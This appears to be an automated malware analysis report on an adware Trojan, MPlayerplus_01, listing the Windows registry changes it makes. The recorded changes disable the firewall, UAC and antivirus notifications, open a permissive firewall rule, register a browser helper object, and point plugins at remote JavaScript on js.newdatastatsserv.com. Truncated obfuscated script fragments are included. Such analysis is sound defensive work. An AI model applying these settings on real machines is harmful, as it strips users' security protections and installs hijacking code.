"a1_833" = "2045653207"
"a4_539" = "3864156219"
"a4_538" = "3856987098"
"a4_249" = "1785111129"
"a4_248" = "1777942008"
"a1_832" = "3386641006"
"a4_245" = "1756434645"
"a4_244" = "1749265524"
"a4_247" = "1770772887"
"a4_246" = "1763603766"
"a4_241" = "1727758161"
"a4_240" = "1720589040"
"a4_243" = "1742096403"
"a4_242" = "1734927282"
"a1_830" = "3006818215"
"a1_837" = "2046415996"
"a1_836" = "1471223928"
"a1_835" = "506371775"
"a1_754" = "1151686891"
"a4_993" = "2823969857"
"a1_834" = "4132990846"
"a1_634" = "104415599"
"a2_463" = "3319304682"
"a2_462" = "3312138459"
"a2_461" = "3304971387"
"a2_460" = "3297788691"
"a2_467" = "3347972441"
"a2_466" = "3340803007"
"a2_465" = "3333650204"
"a2_464" = "3326474225"
"a2_469" = "3362322526"
"a2_468" = "3355156313"
"a1_934" = "3591785402"
"a4_802" = "1454667746"
"a4_872" = "1956506216"
"a2_869" = "1934990952"
"a2_868" = "1927838246"
"a2_867" = "1920659249"
"a2_866" = "1913489605"
"a2_865" = "1906323994"
"a2_864" = "1899158845"
"a2_863" = "1891988840"
"a1_791" = "1504348683"
"a2_861" = "1877640835"
"a2_860" = "1870473570"
"a2_597" = "4279960050"
"a2_596" = "4272794059"
"a2_595" = "4265628117"
"a2_594" = "4258463477"
"a1_338" = "1168606377"
"a1_339" = "2643564842"
"a2_591" = "4236945452"
"a2_590" = "4229778834"
"a1_334" = "578861251"
"a1_335" = "184448182"
"a1_336" = "3760924533"
"a1_337" = "3290197519"
"a1_330" = "703462671"
"a1_331" = "54800311"
"a1_332" = "1685649520"
"a1_333" = "1711265904"
"a2_607" = "56695136"
"a2_606" = "49512641"
"a3_30" = "231909751"
"a2_604" = "35189014"
"a1_64" = "4024610170"
"a2_602" = "20845952"
"a2_601" = "13677060"
"a2_600" = "6512503"
"a4_875" = "1978013579"
"a2_609" = "71031869"
"a2_608" = "63864591"
"a2_265" = "1899819304"
"a2_264" = "1892653656"
"a2_267" = "1914154185"
"a2_266" = "1906989982"
"a2_261" = "1871138504"
"a2_260" = "1863969571"
"a2_263" = "1885472730"
"a2_262" = "1878304043"
"a2_919" = "2293452784"
"a1_908" = "3453607025"
"a2_269" = "1928488830"
"a2_268" = "1921321172"
"a1_905" = "655917524"
"a2_884" = "2042527993"
"a1_482" = "4226090616"
"a1_483" = "1810191455"
"a2_289" = "2071873169"
"a2_288" = "2064698567"
"a1_486" = "2245001074"
"a1_487" = "1985463891"
"a1_484" = "3964511762"
"a1_485" = "582550657"
"a2_283" = "2028859201"
"a2_282" = "2021690489"
"a2_281" = "2014525714"
"a2_280" = "2007356622"
"a2_287" = "2057542948"
"a2_286" = "2050374883"
"a2_285" = "2043191725"
"a2_284" = "2036025304"
"a2_739" = "1003016628"
"a2_738" = "995836605"
"a3_522" = "3725445091"
"a2_733" = "960003892"
"a2_732" = "952834530"
"a2_731" = "945666578"
"a2_730" = "938484639"
"a2_737" = "988671171"
"a2_736" = "981500889"
"a2_735" = "974334303"
"a2_734" = "967170378"
"a4_446" = "3197427966"
"a1_637" = "4289777240"
"a3_912" = "2226582457"
"a1_240" = "1888556951"
"a1_241" = "472744687"
"a1_242" = "3058936332"
"a1_243" = "2628265565"
"a1_244" = "3852462282"
"a1_245" = "362573412"
"a1_246" = "1201760128"
"a1_247" = "1652107045"
"a1_248" = "3990502546"
"a1_249" = "2587302919"
"a3_738" = "978859403"
"a3_739" = "986426922"
"a4_445" = "3190258845"
"a2_131" = "939147894"
"a2_130" = "931980891"
"a2_133" = "953496019"
"a2_132" = "946330291"
"a2_135" = "967833904"
"a2_134" = "960664695"
"a2_137" = "982166193"
"a2_136" = "974998967"
"a2_139" = "996514227"
"a2_138" = "989347454"
"a4_889" = "2078381273"
"a4_888" = "2071212152"
"a2_79" = "566354957"
"a2_78" = "559189617"
"a3_916" = "2254979389"
"a3_288" = "2048100105"
"a3_289" = "2055027624"
"a3_184" = "1336102801"
"a3_917" = "2262558044"
"a3_282" = "2038692083"
"a3_283" = "2045680914"
"a3_280" = "1990631473"
"a3_281" = "2031109200"
"a3_286" = "2067091063"
"a3_287" = "2074141334"
"a3_284" = "2019045813"
"a3_285" = "2026624468"
"a3_606" = "66123703"
"a3_607" = "40004566"
"a3_604" = "52150005"
"a3_605" = "59069204"
"a3_602" = "4023859"
"a3_603" = "11016786"
"a3_600" = "23079281"
"a3_601" = "30657936"
"a4_700" = "723417404"
"a3_608" = "46992457"
"a3_609" = "87597288"
"a1_796" = "226709699"
"a1_583" = "2241026978"
"a1_794" = "1221264522"
"a1_795" = "629567253"
"a1_792" = "3315245633"
"a1_793" = "116422688"
"a1_790" = "930008649"
"a1_582" = "2778799272"
"a3_635" = "240424626"
"a3_911" = "2219532038"
"a1_581" = "4017401496"
"a1_798" = "333538965"
"a1_799" = "3087451236"
"a1_580" = "3100129418"
"a3_198" = "1436076335"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKCU\Software\Aas]
[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"
[HKCU\Software\Aas\695404737]
"50183847" = "6CB4F357E15540EBCF387CD502BE18BB83B2095EA6EE884B0D059449A5342D68E3B2D27FB714B9250509608EC3DEB7EEA20A33E26D97C5486AA270018FFA46A16EE0AF4EE22779AE1BD1BBA23B356C014518440564740352676BB249C23112961C700B388C12E7360016EE2DAFC09E2689A619CC82C6AA0421112571C15FFB27"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"
[HKCU\Software\Aas\695404737]
"35845605" = "392"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Aas\695404737]
"14338242" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
A firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
Adds a rule to the Windows firewall that allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
Firewall notifications are disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"
The process regsvr32.exe:2736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"
[HKCR\CrossriderApp0054246.Sandbox.1]
"(Default)" = "CrossriderApp0054246.Sandbox"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories]
"(Default)" = ""
[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"
[HKCR\CrossriderApp0054246.Sandbox\CurVer]
"(Default)" = "CrossriderApp0054246.Sandbox"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0\0\win32]
"(Default)" = "%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll"
[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\InprocServer32]
"(Default)" = "%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}]
"(Default)" = "MPlayerplus_01"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CrossriderApp0054246.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110511421146}"
[HKCR\CrossriderApp0054246.BHO\CurVer]
"(Default)" = "CrossriderApp0054246"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\ProgID]
"(Default)" = "CrossriderApp0054246.BHO.1"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0]
"(Default)" = "CrossriderApp0054246 Type Library"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0054246.Sandbox"
[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"
[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0054246"
[HKCR\Interface\{66666666-6666-6666-6666-660566426646}]
"(Default)" = "ISandBox"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0\HELPDIR]
"(Default)" = "%Program Files%\MPlayerplus_01"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\ProgID]
"(Default)" = "CrossriderApp0054246.Sandbox.1"
[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CrossriderApp0054246.BHO]
"(Default)" = "CrossriderApp0054246"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CrossriderApp0054246.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220522422246}"
[HKCR\CrossriderApp0054246.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110511421146}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 7A 5B 03 6F 08 2D F2 01 06 02 6B 4F 62 64 84"
[HKCR\CrossriderApp0054246.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220522422246}"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\InprocServer32]
"(Default)" = "%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}]
"(Default)" = "CrossriderApp0054246.Sandbox"
[HKCR\CrossriderApp0054246.BHO.1]
"(Default)" = "CrossriderApp0054246"
[HKCR\Interface\{55555555-5555-5555-5555-550555425546}]
"(Default)" = "ICrossriderBHO"
[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CrossriderApp0054246.Sandbox]
"(Default)" = "CrossriderApp0054246.Sandbox"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110511421146}]
"(Default)" = "CrossriderApp0054246"
"NoExplorer" = "1"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110511421146}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\TypeLib]
The process dwwin.exe:3088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 82 33 8A 31 08 97 0D FF DB BB 2B F9 71 E3 4F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process MPlayerplus_01-codedownloader.exe:2344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\MPlayerplus_01\Plugins\246]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/246.js"
[HKCU\Software\MPlayerplus_01\Plugins\43]
"Name" = "IEMessaging"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\MPlayerplus_01\Plugins\192]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/192.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"Name" = "search_engine_hook"
[HKCU\Software\MPlayerplus_01\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\44]
"Version" = "6"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/13.js"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/78.js"
[HKCU\Software\MPlayerplus_01\Plugins\262]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\246]
"Version" = "15"
[HKCU\Software\MPlayerplus_01\Plugins\281]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/281.js"
[HKCU\Software\MPlayerplus_01\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:)
[HKCU\Software\MPlayerplus_01\Plugins\46]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\4]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64"
[HKCU\Software\MPlayerplus_01\Plugins\40]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\223]
"Name" = "imonomy_m"
[HKCU\Software\MPlayerplus_01\Plugins\246]
"JavaScript" = "var _0x4cfc=[""\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72""
[HKCU\Software\MPlayerplus_01\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"Name" = "jQuery"
[HKCU\Software\MPlayerplus_01\Plugins\192]
"Name" = "revizer_ws_dynamic_b2b_m"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/3.js"
[HKCU\Software\MPlayerplus_01\Plugins\35]
"Name" = "IEAjax"
[HKCU\Software\MPlayerplus_01\Manifest]
"BgVersion" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO4)"
[HKCU\Software\MPlayerplus_01\Plugins\4]
"URL" = "http://js.newdatastatsserv.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.sej)"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appAR)"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/7.js"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/37.js"
[HKCU\Software\MPlayerplus_01\Plugins\180]
"Version" = "12"
[HKCU\Software\MPlayerplus_01\Plugins\94]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/94.js"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\MPlayerplus_01\Plugins\233]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/233.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"URL" = "http://js.newdatastatsserv.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"Version" = "1"
[HKCU\Software\MPlayerplus_01\Plugins\289]
"Version" = "1"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
[HKCU\Software\MPlayerplus_01\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\MPlayerplus_01\Plugins\41]
"Version" = "7"
[HKCU\Software\MPlayerplus_01\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"
[HKCU\Software\MPlayerplus_01\Plugins\230]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/230.js"
[HKCU\Software\MPlayerplus_01\Plugins\42]
"Version" = "10"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,47,94"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"Name" = "CrossriderInfo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\MPlayerplus_01\Plugins\246]
"Name" = "setup"
[HKCU\Software\MPlayerplus_01\Manifest]
"RunInFrame" = "false"
[HKCU\Software\MPlayerplus_01\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,7,9,93,102,104,180,184,192,220,195,211,221,223,230,233,242,244,253,260,262,263,273,275,281,286,289,91"
[HKCU\Software\MPlayerplus_01\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\MPlayerplus_01\Code]
